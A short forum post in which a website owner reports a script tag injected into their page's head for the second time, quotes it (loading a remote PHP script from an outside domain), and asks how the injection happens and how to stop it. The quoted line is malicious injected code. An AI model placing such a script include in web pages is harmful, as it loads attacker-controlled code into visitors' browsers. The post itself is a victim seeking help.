evil inserted script into <head>????

  • Hi,
    this is the second time I’ve had stuff inserted on my site.

    this code:

    </head><script src=https://gimgoszczanow.pl/attach_mod/customize.php ></script>

<body>

    How is it getting on my site?
    How can I prevent this from happening in the future?
    Currently my site is blocked in some browsers due to suspicious code ??
